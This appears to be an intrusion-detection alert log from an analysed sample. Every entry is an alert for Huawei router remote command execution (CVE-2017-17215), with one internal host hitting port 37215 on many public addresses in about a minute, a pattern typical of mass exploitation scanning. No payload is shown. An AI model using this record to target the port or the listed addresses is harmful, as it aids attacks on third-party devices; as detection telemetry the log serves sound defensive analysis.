                                            06/14/24-10:44:00.338264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5055037215192.168.2.14197.0.42.215
                                            06/14/24-10:44:14.684423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615237215192.168.2.14197.236.117.80
                                            06/14/24-10:43:48.015359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054837215192.168.2.14156.133.207.188
                                            06/14/24-10:44:20.829432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738037215192.168.2.14197.5.34.124
                                            06/14/24-10:44:14.682788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959437215192.168.2.14156.169.32.171
                                            06/14/24-10:43:56.244400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4371037215192.168.2.1441.137.230.147
                                            06/14/24-10:44:24.944028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3857037215192.168.2.14156.235.193.8
                                            06/14/24-10:43:56.253474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818237215192.168.2.14156.82.226.34
                                            06/14/24-10:44:04.407184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4400637215192.168.2.14156.232.22.63
                                            06/14/24-10:44:12.616385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802037215192.168.2.14156.70.51.110
                                            06/14/24-10:44:20.803612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003437215192.168.2.14197.87.208.117
                                            06/14/24-10:43:41.847842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102037215192.168.2.14197.158.225.203
                                            06/14/24-10:44:22.861895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4372437215192.168.2.14156.170.171.119
                                            06/14/24-10:43:34.678640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4903237215192.168.2.14197.255.122.101
                                            06/14/24-10:43:45.968582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3912837215192.168.2.14197.84.82.88
                                            06/14/24-10:43:48.029329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477637215192.168.2.14197.81.190.211
                                            06/14/24-10:44:02.381098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710837215192.168.2.1441.56.187.208
                                            06/14/24-10:43:36.701809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736637215192.168.2.14156.204.9.25
                                            06/14/24-10:43:36.705050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4502437215192.168.2.14156.163.195.105
                                            06/14/24-10:44:10.545577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4675037215192.168.2.1441.144.212.251
                                            06/14/24-10:43:36.702172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437037215192.168.2.1441.51.17.68
                                            06/14/24-10:44:20.830238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710237215192.168.2.14156.181.228.135
                                            06/14/24-10:44:24.915713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5297637215192.168.2.14197.71.214.221
                                            06/14/24-10:44:16.732903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729037215192.168.2.1441.201.197.233
                                            06/14/24-10:44:26.978171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4108837215192.168.2.14197.217.199.242
                                            06/14/24-10:44:02.367736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3494837215192.168.2.1441.211.1.14
                                            06/14/24-10:44:02.367456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442637215192.168.2.14197.20.9.137
                                            06/14/24-10:44:26.985484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5069237215192.168.2.14197.190.241.221
                                            06/14/24-10:44:33.151829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3311037215192.168.2.14156.240.180.68
                                            06/14/24-10:43:36.717290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857637215192.168.2.14156.86.252.128
                                            06/14/24-10:43:37.759943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531637215192.168.2.14197.0.89.230
                                            06/14/24-10:44:33.149934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901237215192.168.2.14156.127.151.154
                                            06/14/24-10:43:34.678194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833037215192.168.2.14197.210.203.172
                                            06/14/24-10:44:12.618009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644237215192.168.2.14197.250.76.105
                                            06/14/24-10:44:33.149230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4146037215192.168.2.14156.205.255.151
                                            06/14/24-10:43:45.968617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334237215192.168.2.14197.230.19.146
                                            06/14/24-10:44:08.517737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341637215192.168.2.14156.111.26.215
                                            06/14/24-10:44:14.684821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4185037215192.168.2.14197.186.175.246
                                            06/14/24-10:44:29.012745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238637215192.168.2.14197.228.91.100
                                            06/14/24-10:44:18.760908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5613037215192.168.2.1441.235.161.202
                                            06/14/24-10:44:04.409468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322837215192.168.2.14197.140.9.24
                                            06/14/24-10:43:52.148925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708837215192.168.2.14156.5.163.238
                                            06/14/24-10:43:58.275987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4815437215192.168.2.14197.215.107.102
                                            06/14/24-10:44:04.420067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806837215192.168.2.14156.152.164.100
                                            06/14/24-10:44:35.180997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4781837215192.168.2.14156.255.101.66
                                            06/14/24-10:43:50.074126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4397637215192.168.2.1441.38.178.45
                                            06/14/24-10:44:14.683663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614637215192.168.2.14156.54.149.20
                                            06/14/24-10:44:31.053550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746237215192.168.2.14156.57.28.252
                                            06/14/24-10:43:48.027840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952237215192.168.2.1441.28.90.136
                                            06/14/24-10:43:48.028321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010637215192.168.2.14197.196.151.44
                                            06/14/24-10:43:58.277715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575237215192.168.2.14197.164.86.158
                                            06/14/24-10:44:02.368859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470037215192.168.2.14156.54.167.174
                                            06/14/24-10:44:12.644935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922837215192.168.2.14156.155.249.216
                                            06/14/24-10:44:14.669446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5230237215192.168.2.14156.27.179.142
                                            06/14/24-10:43:52.160415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037237215192.168.2.1441.189.105.73
                                            06/14/24-10:44:00.336570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412037215192.168.2.1441.234.187.154
                                            06/14/24-10:43:41.849739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4286237215192.168.2.1441.178.3.57
                                            06/14/24-10:44:06.451430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3515837215192.168.2.14156.100.48.105
                                            06/14/24-10:44:20.805529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817237215192.168.2.1441.13.56.152
                                            06/14/24-10:43:36.726982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4347837215192.168.2.14197.14.223.85
                                            06/14/24-10:43:58.276652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3962237215192.168.2.1441.6.18.164
                                            06/14/24-10:43:56.242688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4406837215192.168.2.1441.219.142.117
                                            06/14/24-10:44:06.453004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048837215192.168.2.14156.86.48.127
                                            06/14/24-10:43:45.987691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473437215192.168.2.14156.233.178.244
                                            06/14/24-10:43:58.289799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067037215192.168.2.1441.129.20.16
                                            06/14/24-10:43:34.661329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215037215192.168.2.1441.146.247.111
                                            06/14/24-10:44:14.672285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5736437215192.168.2.14197.131.4.76
                                            06/14/24-10:44:06.451600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3875237215192.168.2.14197.118.5.76
                                            06/14/24-10:43:58.293592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475037215192.168.2.14156.8.199.39
                                            06/14/24-10:44:08.519604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5861437215192.168.2.14156.96.177.57
                                            06/14/24-10:43:48.033817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706437215192.168.2.14197.89.209.40
                                            06/14/24-10:44:20.807103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109437215192.168.2.1441.94.225.204
                                            06/14/24-10:43:58.295598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339237215192.168.2.1441.250.133.148
                                            06/14/24-10:44:02.366309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327637215192.168.2.14156.61.0.27
                                            06/14/24-10:44:00.342432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4718437215192.168.2.14156.183.230.108
                                            06/14/24-10:43:34.662438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319637215192.168.2.1441.83.251.197
                                            06/14/24-10:43:58.290011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5231437215192.168.2.1441.186.133.241
                                            06/14/24-10:44:20.830460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3556837215192.168.2.14156.133.153.142
                                            06/14/24-10:43:52.149362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699837215192.168.2.14197.253.61.3
                                            06/14/24-10:43:43.941112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266837215192.168.2.14156.129.234.6
                                            06/14/24-10:43:58.278006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764637215192.168.2.14197.167.247.106
                                            06/14/24-10:43:58.275326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5515237215192.168.2.14156.175.180.142
                                            06/14/24-10:44:16.717433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954837215192.168.2.14156.104.191.54
                                            06/14/24-10:43:43.942390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915237215192.168.2.14197.165.137.152
                                            06/14/24-10:44:16.718102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572237215192.168.2.1441.181.228.214
                                            06/14/24-10:43:41.846513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133437215192.168.2.14156.178.97.126
                                            06/14/24-10:44:02.381715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032237215192.168.2.1441.228.229.205
                                            06/14/24-10:44:24.914480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5750037215192.168.2.14197.223.124.211
                                            06/14/24-10:44:24.932818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840837215192.168.2.14156.107.228.94
                                            06/14/24-10:43:48.032765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4081237215192.168.2.14156.96.55.108
                                            06/14/24-10:44:00.341037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335837215192.168.2.14156.90.56.164
                                            06/14/24-10:44:06.450011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853637215192.168.2.1441.216.22.171
                                            06/14/24-10:43:58.291953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3372037215192.168.2.14197.128.64.3
                                            06/14/24-10:43:48.032955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4671237215192.168.2.14156.128.197.13
                                            06/14/24-10:43:54.185866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4508237215192.168.2.14197.77.244.165
                                            06/14/24-10:44:00.339395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3973037215192.168.2.1441.4.237.5
                                            06/14/24-10:44:29.025237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892037215192.168.2.14197.188.175.10
                                            06/14/24-10:43:50.071529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5069237215192.168.2.14197.126.107.185
                                            06/14/24-10:43:50.115825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154637215192.168.2.14156.201.51.223
                                            06/14/24-10:43:50.115936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548837215192.168.2.14156.119.67.140
                                            06/14/24-10:43:54.202370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626037215192.168.2.1441.7.113.169
                                            06/14/24-10:44:04.424955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226837215192.168.2.14197.238.180.90
                                            06/14/24-10:43:54.198666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833637215192.168.2.14156.250.54.116
                                            06/14/24-10:44:16.734737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5761037215192.168.2.14156.221.159.63
                                            06/14/24-10:44:14.671789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954837215192.168.2.14197.121.74.247
                                            06/14/24-10:44:12.614082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445437215192.168.2.14156.241.99.127
                                            06/14/24-10:44:18.777185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197837215192.168.2.14197.42.238.230
                                            06/14/24-10:43:56.253610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521837215192.168.2.14197.152.72.34
                                            06/14/24-10:44:20.806218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026637215192.168.2.14156.91.142.232
                                            06/14/24-10:44:31.083757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759037215192.168.2.1441.5.57.143
                                            06/14/24-10:44:31.054839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650437215192.168.2.14156.235.184.227
                                            06/14/24-10:44:24.916235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883637215192.168.2.14156.220.105.17
                                            06/14/24-10:44:14.670042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783037215192.168.2.14197.153.249.142
                                            06/14/24-10:43:50.074585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3334637215192.168.2.14156.14.11.121
                                            06/14/24-10:43:34.661085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398437215192.168.2.1441.20.102.108
                                            06/14/24-10:44:33.150934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805437215192.168.2.1441.108.78.246
                                            06/14/24-10:43:43.942635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3964437215192.168.2.14156.151.36.129
                                            06/14/24-10:44:22.878603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4647237215192.168.2.14156.39.10.157
                                            06/14/24-10:44:26.986019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3900637215192.168.2.14197.123.155.248
                                            06/14/24-10:43:41.907077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570237215192.168.2.1441.139.214.131
                                            06/14/24-10:44:26.985924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792637215192.168.2.1441.37.73.21
                                            06/14/24-10:43:56.230262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188837215192.168.2.1441.232.78.50
                                            06/14/24-10:44:26.979064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362837215192.168.2.1441.36.37.97
                                            06/14/24-10:43:56.230087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4578837215192.168.2.1441.42.136.43
                                            06/14/24-10:44:33.149967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189637215192.168.2.14197.33.149.80
                                            06/14/24-10:44:26.999723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483237215192.168.2.14197.245.169.69
                                            06/14/24-10:44:12.618280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777037215192.168.2.14156.168.127.30
                                            06/14/24-10:44:18.761921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089237215192.168.2.1441.223.71.100
                                            06/14/24-10:44:29.025201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009237215192.168.2.14197.148.28.0
                                            06/14/24-10:43:34.661227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4830837215192.168.2.14197.82.207.29
                                            06/14/24-10:43:43.941619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4271837215192.168.2.1441.193.111.250
                                            06/14/24-10:44:12.614272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139837215192.168.2.1441.101.61.115
                                            06/14/24-10:43:39.809955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5643837215192.168.2.14197.39.172.85
                                            06/14/24-10:44:33.134249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862837215192.168.2.1441.15.15.78
                                            06/14/24-10:43:52.146648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674437215192.168.2.14197.112.35.99
                                            06/14/24-10:43:54.201260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4583037215192.168.2.14197.168.102.120
                                            06/14/24-10:43:52.162443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3656637215192.168.2.14197.242.10.206
                                            06/14/24-10:44:31.092268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615437215192.168.2.14197.5.105.227
                                            06/14/24-10:44:16.718129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998437215192.168.2.14156.90.237.66
                                            06/14/24-10:44:33.134497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684837215192.168.2.14197.82.2.54
                                            06/14/24-10:43:54.185924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115637215192.168.2.14156.41.250.198
                                            06/14/24-10:44:27.001937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6008237215192.168.2.14197.210.19.117
                                            06/14/24-10:44:20.830691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3875637215192.168.2.14197.6.200.102
                                            06/14/24-10:43:48.033093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5369237215192.168.2.14156.123.79.248
                                            06/14/24-10:43:34.663735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415837215192.168.2.14197.75.9.62
                                            06/14/24-10:43:54.184472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177637215192.168.2.1441.68.36.93
                                            06/14/24-10:43:58.275535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876437215192.168.2.14197.67.245.83
                                            06/14/24-10:43:48.033274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4529637215192.168.2.14197.129.172.251
                                            06/14/24-10:43:39.810090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688837215192.168.2.14197.23.251.116
                                            06/14/24-10:43:56.244076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710237215192.168.2.14156.126.142.143
                                            06/14/24-10:43:39.812030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686637215192.168.2.14197.68.197.84
                                            06/14/24-10:44:06.469590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4227037215192.168.2.1441.65.208.160
                                            06/14/24-10:44:10.543803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375837215192.168.2.14156.69.186.75
                                            06/14/24-10:43:34.679416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371437215192.168.2.14197.99.61.27
                                            06/14/24-10:43:56.245359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805037215192.168.2.1441.186.153.24
                                            06/14/24-10:43:43.972448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871437215192.168.2.14156.109.221.127
                                            06/14/24-10:44:04.423854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4476437215192.168.2.14197.88.0.151
                                            06/14/24-10:44:29.014229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754837215192.168.2.14156.80.15.36
                                            06/14/24-10:43:50.073530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5202237215192.168.2.14156.208.23.193
                                            06/14/24-10:43:34.677576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5393237215192.168.2.14197.204.104.152
                                            06/14/24-10:44:00.321939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137237215192.168.2.14156.26.203.154
                                            06/14/24-10:43:39.792157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458237215192.168.2.14156.16.234.215
                                            06/14/24-10:44:31.056458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644837215192.168.2.14197.126.196.157
                                            06/14/24-10:44:10.548414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098037215192.168.2.14156.244.170.187
                                            06/14/24-10:44:04.406904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685437215192.168.2.1441.127.0.148
                                            06/14/24-10:44:31.051405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956437215192.168.2.14197.145.30.88
                                            06/14/24-10:43:50.073212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763437215192.168.2.14156.19.121.6
                                            06/14/24-10:44:24.942353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353637215192.168.2.14197.1.109.7
                                            06/14/24-10:43:36.726155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4771837215192.168.2.1441.59.86.136
                                            06/14/24-10:43:41.906063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5557637215192.168.2.14156.70.132.35
                                            06/14/24-10:44:22.878706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559037215192.168.2.14197.74.215.178
                                            06/14/24-10:43:34.662859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863237215192.168.2.14197.96.60.42
                                            06/14/24-10:44:14.684168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199437215192.168.2.1441.75.122.21
                                            06/14/24-10:44:10.542836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318637215192.168.2.1441.91.149.225
                                            06/14/24-10:44:22.860301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004637215192.168.2.1441.24.136.246
                                            06/14/24-10:43:41.898139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5646437215192.168.2.14197.49.222.147
                                            06/14/24-10:44:12.645230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5637837215192.168.2.14156.109.169.253
                                            06/14/24-10:44:14.672068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4119637215192.168.2.14156.253.8.94
                                            06/14/24-10:43:54.186666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500237215192.168.2.14197.127.250.155
                                            06/14/24-10:44:16.718647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026037215192.168.2.14156.76.59.55
                                            06/14/24-10:43:43.943958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613637215192.168.2.14156.12.47.2
                                            06/14/24-10:43:39.810139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5368837215192.168.2.1441.100.148.228
                                            06/14/24-10:43:34.676562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136437215192.168.2.14197.37.227.10
                                            06/14/24-10:44:20.828531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4248837215192.168.2.14197.132.202.58
                                            06/14/24-10:44:20.807605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5728837215192.168.2.14156.16.66.249
                                            06/14/24-10:43:36.729929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5062237215192.168.2.1441.216.208.178
                                            06/14/24-10:43:54.202916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4566237215192.168.2.14197.102.191.111
                                            06/14/24-10:44:16.715940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4795437215192.168.2.14197.58.117.7
